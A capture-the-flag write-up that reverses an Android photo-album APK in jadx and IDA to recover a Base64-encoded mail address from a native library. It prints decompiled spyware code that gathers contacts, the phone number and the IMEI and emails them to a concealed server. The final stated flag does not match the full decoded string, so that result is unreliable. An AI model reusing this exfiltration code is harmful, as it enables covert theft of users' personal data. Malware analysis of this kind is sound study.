BUUCTF-Reverse-相册 (Photo Album)

Date: 2022-04-10 17:30:34

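Opening in jadx-gui

The downloaded file ends in ".apk", so open it with jadx-gui.

Following the challenge hint, search for the keyword mail.

Select the first result and click "Go to".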

    public static int sendMailByJavaMail(String mailto, String title, String mailmsg) {
        if (!debug) {
            Mail m = new Mail(C2.MAILUSER, C2.MAILPASS);
            m.set_host(C2.MAILHOST);
            m.set_port(C2.PORT);
            m.set_debuggable(true);
            m.set_to(new String[]{mailto});
            m.set_from(C2.MAILFROME);
            m.set_subject(title);
            m.setBody(mailmsg);
            try {
                if (m.send()) {
                    Log.i("IcetestActivity", "Email was sent successfully.");
                } else {
                    Log.i("IcetestActivity", "Email was sent failed.");
                }
            } catch (Exception e) {
                Log.e("MailApp", "Could not send email", e);
            }
        }
        return 1;
    }

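Judging by the data passed in through the parameter list of sendMailByJavaMail(), this method is the key.

Search again to see what calls sendMailByJavaMail().

Select the second result and go to it.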

    public void run(String content2) {
        // Build one "name:number" line per contact entry.
        String notebooks = "";
        for (String[] note : NoteBook.get(this.context, IMAPStore.RESPONSE)) {
            notebooks = String.valueOf(notebooks) + note[0] + ":" + note[1] + "\r\n";
        }
        // Read the device's own phone number, falling back to the one parsed from content2.
        String tel = ((TelephonyManager) this.context.getSystemService("phone")).getLine1Number();
        if (tel == null || tel.equals("")) {
            tel = A2.getNoteBook(content2).phoneNumber;
        }
        A2.getNoteBook(content2);
        if (!A2.isEmpty(notebooks)) {
            // Mail the contact list to C2.MAILSERVER; the subject ("通讯录" = "contacts")
            // carries the phone number and the IMEI from getDeviceId().
            A2.sendMailByJavaMail(C2.MAILSERVER, "通讯录(" + tel + "IMEI" + ((TelephonyManager) this.context.getSystemService("phone")).getDeviceId() + ")", notebooks);
        }
    }

The call uses a MAILSERVER constant. Right-click it and choose "Go to declaration".

    public static final String CANCELNUMBER = "%23%2321%23";
    public static final String MAILFROME = Base64.decode(NativeMethod.m());
    public static final String MAILHOST = "";
    public static final String MAILPASS = Base64.decode(NativeMethod.pwd());
    public static final String MAILSERVER = Base64.decode(NativeMethod.m());
    public static final String MAILUSER = Base64.decode(NativeMethod.m());
    public static final String MOVENUMBER = "**21*121%23";
    public static final String PORT = "25";
    public static final String date = "2115-11-1";
    public static final String phoneNumber = Base64.decode(NativeMethod.p());

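The value returned by NativeMethod's m is passed through Base64.decode(), so it is stored Base64-encoded.

MAILSERVER is the value returned by the NativeMethod.m1m() function in the external .so file, after Base64 decoding. So we only need to find the Base64-encoded string in the .so file.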

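Opening in IDA

Select "lib/armeabi/libcore.so" and click OK.

Press Shift + F12 to open the Strings window.

Double-click "MTgyMTg0NjUxMjVAMTYzLmNvbQ=="

This locates the Base64-encoded string: "MTgyMTg0NjUxMjVAMTYzLmNvbQ=="

Base64-decoding it gives flag{18218465125@}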
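The Shift + F12 string search above can also be scripted when triaging a native library. The following is an added example, not part of the original write-up: it scans a byte blob for Base64-looking runs and keeps only those that decode to printable ASCII. SAMPLE_BLOB is constructed filler around the one literal quoted above, and find_base64_strings is a hypothetical helper name.

```python
import base64
import binascii
import re

# Runs of Base64 alphabet characters, at least 16 long, with optional padding.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")

# Constructed bytes standing in for part of libcore.so's string data.
# Only the Base64 literal is taken from the write-up; the rest is filler,
# including a Base64 alphabet table as a realistic false-positive candidate.
SAMPLE_BLOB = (
    b"\x7fELF\x01\x01\x01\x00"
    b"libcore.so\x00NativeMethod\x00"
    b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x00"
    b"MTgyMTg0NjUxMjVAMTYzLmNvbQ==\x00"
    b"\x00\x10\x20\x30"
)


def find_base64_strings(blob: bytes) -> list[tuple[int, str, str]]:
    """Return (offset, encoded, decoded) for runs that decode to printable ASCII."""
    hits = []
    for match in B64_RUN.finditer(blob):
        encoded = match.group()
        if len(encoded) % 4:
            continue  # not a whole number of 4-character Base64 groups
        try:
            raw = base64.b64decode(encoded, validate=True)
        except (binascii.Error, ValueError):
            continue
        # Keep only results that look like text (addresses, hosts, passwords).
        if raw and all(0x20 <= b < 0x7F for b in raw):
            hits.append((match.start(), encoded.decode("ascii"), raw.decode("ascii")))
    return hits


if __name__ == "__main__":
    for offset, encoded, decoded in find_base64_strings(SAMPLE_BLOB):
        print(f"0x{offset:04x}  {encoded}  ->  {decoded}")
```

To run it against the real file, read lib/armeabi/libcore.so from the unpacked APK in binary mode and pass the bytes to find_base64_strings().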
